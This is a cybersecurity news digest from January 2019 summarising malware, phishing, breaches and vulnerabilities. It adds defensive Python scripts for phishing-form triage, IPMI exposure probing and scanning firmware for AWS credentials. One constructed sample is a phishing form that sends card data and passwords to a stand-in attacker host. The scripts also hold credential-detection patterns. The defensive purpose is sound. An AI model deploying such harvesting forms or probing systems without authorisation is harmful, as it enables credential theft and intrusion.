Silobreaker Daily Cyber Digest – 2 January 2019
New Shamoon sample signed with Baidu certificate
- A new sample of the Shamoon disk-wiping malware was recently uploaded to VirusTotal from France. It attempts to pass as a system optimisation tool from Chinese technology company Baidu and is signed with an old Baidu certificate that is no longer valid, so the signature does not survive proper chain validation even though the file presents as signed.
- Shamoon has previously been observed targeting oil and gas companies in the Middle East region. The attackers behind the latest campaign have also targeted this area, as well as Europe, using the malware to delete files on infected systems and make machines unbootable.
- The malware uses superficial disguise tactics such as setting its internal file name to ‘Baidu PC Faster’ and its description to ‘Baidu WiFi Hotspot Setup’. Researchers assess that this version was built from the second version of the codebase, given its similarities with Shamoon v2.
Fileless ransomware an emerging threat for US businesses
- A new report by Malwarebytes Labs details the growing risk of fileless ransomware attacks against organisations in the US. Specifically, the report examines SOREBRECT, which has been described as ‘the first of its kind’ because it combines traditional ransom functionality with fileless tactics. Other fileless attacks analysed include Trickbot, EMOTET and SamSam.
Ryuk ransomware disrupts printing and delivery of major US newspapers
- Newspapers affected by the attack include the Wall Street Journal, New York Times, Los Angeles Times, Chicago Tribune and more. An analysis of Ryuk ransomware by Check Point showed code similarities with Hermes ransomware, which has been previously associated with North Korean hacking group Lazarus.
- The Los Angeles Times published an article stating that the outage was due to ‘a malware attack, which appears to have originated from outside the United States and hobbled computer systems and delayed weekend deliveries.’
American Express phishing emails contain HTML phishing form attachment
- A new phishing campaign has been observed using emails purportedly from American Express, stating that there is an issue with the target’s credit card. The recipient is prompted to open an attached HTML phishing form that sends the information entered back to the attackers. Several variants of this email have been sent since October 2018.
- The campaign uses sender domains built around the keywords ‘American Express’ and subject lines such as ‘Notice Concerning your CardMember Account’.
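A practitioner triaging the attachment wants to know where the form actually submits. The script below is an added example, not code from the digest or from the researchers who reported the campaign: it parses an HTML attachment with the standard library, collects every form and its inputs, and flags forms that ask for card or password data but post to a host outside the impersonated brand’s own domains. The sample attachment is constructed, and secure-amex-verify.example.net is a hypothetical drop host.

```python
"""Triage an HTML e-mail attachment for credential-harvesting forms.

Added example: collects each <form> and the inputs it contains, then flags
forms that collect sensitive data and submit it anywhere other than the
brand's own domains. SAMPLE_ATTACHMENT is constructed for this example and
secure-amex-verify.example.net is a hypothetical attacker host.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field names that indicate card or account-credential collection.
SENSITIVE_FIELDS = {
    "password", "passwd", "pin", "ssn", "cvv", "cvc", "cvv2",
    "cardnumber", "card_number", "ccnum", "exp", "expiry", "dob",
}


class FormCollector(HTMLParser):
    """Record each form's action/method and the name/type of its inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {
                "action": attrs.get("action", ""),
                "method": attrs.get("method", "get").lower(),
                "fields": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["fields"].append({
                "name": attrs.get("name", "").lower(),
                "type": attrs.get("type", "text").lower(),
            })

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def triage(html, brand_domains):
    """Return one finding per form that collects sensitive fields and does
    not submit to one of brand_domains (a missing/relative action counts
    as untrusted: a file opened from disk has no brand origin)."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        host = (urlparse(form["action"]).hostname or "").lower()
        sensitive = [
            f["name"] for f in form["fields"]
            if f["type"] == "password" or f["name"] in SENSITIVE_FIELDS
        ]
        trusted = any(host == d or host.endswith("." + d) for d in brand_domains)
        if sensitive and not trusted:
            findings.append({
                "action_host": host or "(relative or missing action)",
                "method": form["method"],
                "sensitive_fields": sensitive,
            })
    return findings


# Constructed sample: the logo loads from the real brand site to look
# legitimate, while the form itself posts card data to an unrelated host.
SAMPLE_ATTACHMENT = """<html><body>
<img src="https://www.americanexpress.com/logo.png">
<h2>Notice Concerning your CardMember Account</h2>
<form action="https://secure-amex-verify.example.net/post.php" method="POST">
  Card number: <input name="cardnumber" type="text">
  Expiry: <input name="exp" type="text">
  Security code: <input name="cvv" type="text">
  Password: <input name="password" type="password">
  <input type="submit" value="Verify">
</form>
</body></html>"""

if __name__ == "__main__":
    for finding in triage(SAMPLE_ATTACHMENT, {"americanexpress.com"}):
        print(finding)
```

Because the check keys on the form’s action rather than on branding or sender, it still fires when the attachment embeds genuine brand images and copy, which is exactly what makes these lures convincing.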
JungleSec ransomware infects targets through IPMI remote consoles
- Since November, several Linux, Mac and Windows users have been infected with JungleSec ransomware through their unsecured Intelligent Platform Management Interface (IPMI) systems.
- The attackers gained access to the servers through the IPMI interface and rebooted them into single-user mode to obtain root access, after which they downloaded and compiled the ccrypt encryption program and ran it manually to encrypt the victim’s files.
- A message is then displayed asking the victim to read a file named ENCRYPTED[.]md[.]file, which contains a ransom note with contact information asking for 0.3 bitcoin to be sent to the enclosed bitcoin address.
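The exposure here is a BMC reachable from the internet, which is something an inventory check can find before an attacker does. The script below is an added example, not code from the digest or from the researchers who reported JungleSec: it builds an ASF RMCP Presence Ping (the packet layouts follow the DMTF ASF specification: RMCP header, then an ASF message carrying the IANA enterprise number 4542), sends it to UDP port 623, and parses the Presence Pong to see whether the responder advertises IPMI. The sample pong is constructed; probe() sends real traffic and must only be pointed at hosts you are authorised to test, and a pong only proves exposure, not weak credentials.

```python
"""Detect an exposed IPMI/BMC with an ASF RMCP Presence Ping on UDP 623.

Added example. Packet layouts follow the DMTF ASF specification:
  RMCP header : version 0x06, reserved, sequence (0xFF = no ack), class 0x06 (ASF)
  ASF message : IANA enterprise number (4542), message type, tag, reserved, data length
Presence Pong data (16 bytes): IANA, OEM-defined, supported entities
(bit 7 = IPMI supported, bits 3:0 = ASF version), supported interactions,
6 reserved bytes. SAMPLE_PONG below is constructed for this example.
"""
import socket
import struct

ASF_IANA = 0x000011BE                            # DMTF/ASF enterprise number (4542)
RMCP_HEADER = bytes([0x06, 0x00, 0xFF, 0x06])     # version 6, reserved, seq 0xFF, ASF class
ASF_PRESENCE_PING = 0x80
ASF_PRESENCE_PONG = 0x40
IPMI_PORT = 623


def build_presence_ping(tag=0):
    """RMCP header + ASF Presence Ping with no data (12 bytes)."""
    return RMCP_HEADER + struct.pack(">IBBBB", ASF_IANA, ASF_PRESENCE_PING, tag & 0xFF, 0x00, 0x00)


def parse_presence_pong(data, expected_tag=None):
    """Return the advertised capabilities, or None if data is not a valid pong."""
    if len(data) < 28 or data[0] != 0x06 or data[3] != 0x06:
        return None
    iana, msg_type, tag, _reserved, data_len = struct.unpack(">IBBBB", data[4:12])
    if iana != ASF_IANA or msg_type != ASF_PRESENCE_PONG or data_len < 16:
        return None
    if expected_tag is not None and tag != expected_tag:
        return None  # reply does not match our request
    oem_iana, oem_defined, entities, interactions = struct.unpack(">IIBB", data[12:22])
    return {
        "ipmi_supported": bool(entities & 0x80),
        "asf_version": entities & 0x0F,
        "rmcp_security_extensions": bool(interactions & 0x80),
        "dmtf_dash": bool(interactions & 0x40),
        "oem_iana": oem_iana,
        "oem_defined": oem_defined,
    }


def probe(host, port=IPMI_PORT, timeout=2.0, tag=0x01):
    """Send one ping and parse the reply. Only use against hosts you own."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_presence_ping(tag), (host, port))
        try:
            data, _ = sock.recvfrom(1024)
        except socket.timeout:
            return None
    return parse_presence_pong(data, expected_tag=tag)


# Constructed reply: tag 1, 16 data bytes, entities 0x81 = IPMI supported, ASF v1.
SAMPLE_PONG = bytes.fromhex(
    "0600ff06"      # RMCP header
    "000011be"      # IANA enterprise number
    "40" "01" "00" "10"   # pong, tag 1, reserved, data length 16
    "000011be"      # IANA (data)
    "00000000"      # OEM-defined
    "81" "00"       # supported entities, supported interactions
    "000000000000"  # reserved
)

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(sys.argv[1], probe(sys.argv[1]))
    else:
        print(parse_presence_pong(SAMPLE_PONG, expected_tag=1))
```

Any host that answers this from an untrusted network should be moved behind a management VLAN or VPN; the pong does not exercise authentication, so a reply says nothing about whether the BMC also has default or weak credentials.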
New BMW lottery email scam
- Emails stating that the recipient has won a free 2018 BMW 2 Series M240i are circulating in an attempt to gather victims’ personal information. The scam emails carry the subject line ‘Claim Your Car and Check With your Winning Code’.
- Victims are told that in order to claim the prize they must send in their full name, address and mobile number. Attackers reportedly follow up a reply with requests for further sensitive information such as social security numbers.
ESET publishes analysis of the latest Emotet campaign
- The campaign was recently observed targeting South America with email messages purportedly containing information about the dispatch of goods, in an attempt to propagate Emotet. The email carries an attachment presented as a PDF invoice which, when opened, asks the recipient to enable macros.
- ESET’s report includes a complete technical analysis of the embedded file.
‘Roma225’ Campaign targets Italian automotive companies
- Cybaze Yoroi ZLab researchers report that the malware was spread via a convincing phishing email impersonating a senior partner of the Brazilian business law firm Veirano Advogados. The email contains a PowerPoint document with an auto-open VBA macro.
- The file’s final payload is RevengeRAT which, once executed, contacts its C&C server to send information from the victim’s machine.
Hackers abuse Google Cloud Storage to host malicious payloads
- Menlo Labs researchers discovered a malicious email campaign targeting employees of US and UK banks and financial services companies, using Google Cloud Storage to deliver malicious payloads. Because the payloads are served from a trusted Google domain, URL-reputation controls that allow that domain let them through.
- The payloads are hosted on storage.googleapis[.]com and consist of the Houdini and QRat malware families.
Leaks and Breaches
Celebrity Twitter accounts hijacked by spoofing phone numbers
- Twitter allows tweets to be posted by text message from the phone number linked to an account. Insinia Security’s chief executive Mike Godfrey stated that spoofing someone’s number is enough to gain permission to post on their Twitter account.
- Twitter provides a text message service that lets a user send commands to follow users, tweet, enable and disable notifications and send direct messages. Twitter does not verify that a message really came from the number it claims to come from, so it executes the commands against whichever account is linked to that number.
- Using the method, Insinia was able to publish a message stating, ‘this account has been temporarily hijacked by INSINIA SECURITY’. The accounts of Simon Calder, Eamonn Holmes and Louis Theroux showed these unauthorised messages.
Nova Entertainment warns of data breach affecting over 261,000 Australian citizens
- The exposed information, collected between 2009 and 2011, includes hashed usernames and passwords, emails, residential addresses, phone numbers, genders and birthdates. In total, 261,948 people were affected by the breach.
- According to Nova’s official statement, no financial information or copies of IDs were disclosed.
Dental Center of Northwest Ohio suffers data breach exposing patients’ personal information
- According to the Dental Center’s statement, its IT vendor, Arakyta, was hit by ransomware that disrupted the systems storing the Dental Center’s information. The Center did not disclose the number of patients affected.
- The breached data includes names, addresses, birthdates, Social Security numbers, state identification numbers, driver’s license numbers, health insurance and benefit information, financial account information, and more.
The Dark Overlord threatened to leak insurance files relating to 9/11 attacks
- The Dark Overlord announced on Pastebin that they had breached a law firm that handled cases related to the September 11 attacks and threatened to publicly release the documents unless a ransom was paid. The group tweeted, ‘we’ll be providing many answers about 9.11 conspiracies through our 18.000 secret documents leak.’
- The group claimed that they had hacked insurers and legal firms including Hiscox Syndicates Ltd, Lloyds of London and Silverstein Properties.
BBC formally complains to Russia following leak of employees’ personal data
- A formal complaint was issued to Russia’s Ministry of Foreign Affairs regarding an incident in which 44 journalists’ full names and photographs were published on social media by the ‘For Mother Russia’ group on December 25th, 2018. The information was also published on Russian websites pikabu[.]ru and segodnya[.]ru.
Victorian Government suffers data breach affecting 30,000 employees
- The Government of Victoria, Australia, suffered a breach in which employees’ work emails, job titles, work phone numbers and possibly mobile phone numbers, were compromised. No banking or financial information was affected.
Approximately 1,000 North Korean defectors’ details leaked
- The details were leaked as a result of a hack, which could leave the defectors exposed to severe threats from the regime. The details of the defectors, who are now living in South Korea, were stolen after hackers broke into an archive maintained at a centre that helps North Korean defectors settle in South Korea.
- The attackers carried out a spear phishing attack against employees at the Hanna Centre, which infected a staff member’s computer with malware.
Over 14,000 Bevmo customers impacted in payment card breach
- Attackers used a software skimmer that allowed them to capture customer information from orders placed between August 2nd and September 26th, 2018. Stolen data includes names, phone numbers, addresses, credit and debit card details, and security codes.
Users lose Bitcoin after hacker targets Electrum wallets
- A hacker or hacker group has stolen over 200 Bitcoin, the equivalent of approximately $750,000, by adding several malicious servers to the Electrum wallet network.
- When a legitimate Electrum user initiates a Bitcoin transaction that reaches one of the malicious servers, the server replies with an error message urging the user to download a wallet update from a malicious website.
- If the malicious update is installed, it asks for a 2FA code, which the fake wallet then uses to move the user’s funds to the attacker’s Bitcoin address.
Windows Zero-day bug with published PoC code overwrites files with arbitrary data
- Proof-of-concept (PoC) code, published by a researcher using the online alias SandboxEscaper, overwrites ‘pci[.]sys’ with information about software and hardware problems collected through the Windows Error Reporting (WER) event-based feedback infrastructure.
- The PoC relies on a race condition, does not work on machines with a single CPU, and reportedly depends on other operations whose timing may break the outcome.
- The exploit is the second published by SandboxEscaper for a zero-day bug in Windows this month.
Exploit code published for remote code execution via Microsoft Edge
- The exploit code demonstrates a memory corruption bug in Microsoft’s Edge web browser that can lead to remote code execution on unpatched machines; the published code triggers an out-of-bounds (OOB) memory read that leaks memory contents.
Critical vulnerability discovered in Guardzilla IoT camera
- CVE-2018-5560 is a design and implementation flaw in which Amazon Simple Storage Service (S3) credentials are embedded in the Guardzilla Security Camera firmware. Once the credentials are extracted, any unauthenticated user can collect the data from every affected system over the internet.
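Embedded cloud credentials are easy to find once you look, which is the point of the flaw: whoever pulls the firmware gets the same access the cameras have. The script below is an added example, not code from the digest or from the researchers who reported the Guardzilla issue: it scans a binary blob for the AWS access key ID format (AKIA/ASIA followed by 16 upper-case alphanumerics) and, near each hit, for 40-character candidate secret keys with enough Shannon entropy to be real. The firmware sample is constructed, and the key values in it are the ones AWS itself publishes as documentation placeholders.

```python
"""Scan a firmware image for hard-coded AWS credentials.

Added example. Looks for access key IDs by format, then for high-entropy
40-character strings near each hit as secret-key candidates. FIRMWARE_SAMPLE
is constructed; AKIAIOSFODNN7EXAMPLE and wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
are the placeholder values from AWS's own documentation, not live keys.
"""
import math
import re

# Access key IDs: AKIA (long-term) or ASIA (temporary) + 16 upper-case alphanumerics.
AWS_ACCESS_KEY_RE = re.compile(rb"(?<![A-Z0-9])(?:AKIA|ASIA)[A-Z0-9]{16}(?![A-Z0-9])")
# Secret access keys are 40 characters from the base64-like alphabet.
AWS_SECRET_CANDIDATE_RE = re.compile(rb"(?<![A-Za-z0-9/+])[A-Za-z0-9/+]{40}(?![A-Za-z0-9/+])")


def shannon_entropy(data):
    """Bits per byte; random secrets score high, padding and names score low."""
    if not data:
        return 0.0
    counts = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def find_aws_credentials(blob, window=512, min_entropy=4.0):
    """Return a finding per access key ID, with nearby secret-key candidates
    that pass the entropy threshold (filters out runs like 'AAAA...')."""
    findings = []
    for match in AWS_ACCESS_KEY_RE.finditer(blob):
        start = max(0, match.start() - window)
        end = min(len(blob), match.end() + window)
        region = blob[start:end]
        secrets = [
            s.group(0).decode("ascii")
            for s in AWS_SECRET_CANDIDATE_RE.finditer(region)
            if shannon_entropy(s.group(0)) >= min_entropy
        ]
        findings.append({
            "offset": match.start(),
            "access_key_id": match.group(0).decode("ascii"),
            "secret_candidates": secrets,
        })
    return findings


# Constructed firmware fragment: an ELF-like header, some strings an uploader
# binary might carry, and a 40-byte low-entropy run that must NOT be reported.
FIRMWARE_SAMPLE = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"/usr/bin/uploader\x00"
    + b"s3.amazonaws.com\x00"
    + b"AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\x00"
    + b"AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\x00"
    + b"A" * 40 + b"\x00"
    + b"\x00" * 64
)

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else FIRMWARE_SAMPLE
    for hit in find_aws_credentials(blob):
        print(hit)
```

Run it against an unpacked firmware image (or each file extracted from it) rather than only the raw image, since compressed file systems hide the strings; and treat every hit as a credential to rotate, not merely a finding to report.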
Researchers discover cryptocurrency wallets Trezor and Ledger are vulnerable to several attacks
- A team of researchers demonstrated how wallets including the Trezor One, Ledger Nano S and Ledger Blue are vulnerable to firmware, side-channel, microcontroller and supply-chain attacks. Their findings were presented at the 35C3 conference in Leipzig, Germany.
Three vulnerabilities found in Schneider Electric vehicle charging stations
- The first bug, tracked as CVE-2018-7800, is a hard-coded credentials vulnerability that could be exploited to gain access to the device. The second, tracked as CVE-2018-7801, is a code injection vulnerability that could allow remote code execution with maximum privileges. The third flaw, tracked as CVE-2018-7802, is a SQL injection vulnerability that could allow access to the web interface with full privileges.
- The bugs affect Schneider Electric EVLink Parking products v3.2.0-12_v1 and earlier. They were discovered by researchers at Positive Technologies. Schneider has since released an update addressing the flaws.
Facebook accused of tracking non-users via Android apps
- According to a report by Privacy International, a number of applications including Kayak, Yelp and Shazam send tracking and personal information back to Facebook. The report states that ‘Facebook routinely tracks users, non-users and logged-out users outside its platform through Facebook Business Tools.’
- The researchers used a free software tool named ‘mitmproxy’ to analyse the data that the apps transmit back to Facebook. In an analysis of 34 Android apps it was discovered that 61% transferred data to Facebook the moment a user opened the app.
- Information shared includes data on the device being used, the language, time zone settings and other sensitive data.
Researcher demonstrates how hacked voicemail systems permit account takeover
- Security researcher Martin Vigo found that voicemail systems are vulnerable to compromise through brute-force attacks against the four-digit personal identification numbers (PINs) that protect them. By breaking into a user’s voicemail, an attacker can intercept the voice-call password resets and verification codes offered by services such as WhatsApp, PayPal, LinkedIn or Netflix and take over those accounts.
Thousands of devices remain infected with WannaCry
- Kryptos Logic researchers analysed WannaCry ransomware’s kill switch domain and found that over 630,000 unique IP addresses from 194 different countries have connected to the domain in just one week. This indicates that hundreds of thousands of devices worldwide remain infected with the ransomware.
- The main countries that remain infected are China, Indonesia and Vietnam.
Iran’s resistance movement claims Iranian regime is waging cyber warfare against citizens
- The Express reported that Iran’s Islamic Revolutionary Guard Corps (IRGC) and Ministry of Intelligence and Security (MOIS) are implementing ‘cyber warfare to preserve theocracy’. The claim is based on a report by the official Iranian resistance movement, the National Council of Resistance of Iran (NCRI) that was shared with the tabloid.
- According to NCRI, the regime is routing internet traffic through state-controlled systems preventing individuals from evading state-sponsored ‘cyber repression’. Furthermore, NCRI claims that Iran’s government is using mobile malware and spyware to monitor Iranian citizens. The malware is distributed via smartphone apps through Iran’s Android marketplace ‘Café Bazaar’.
The Silobreaker Team
Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.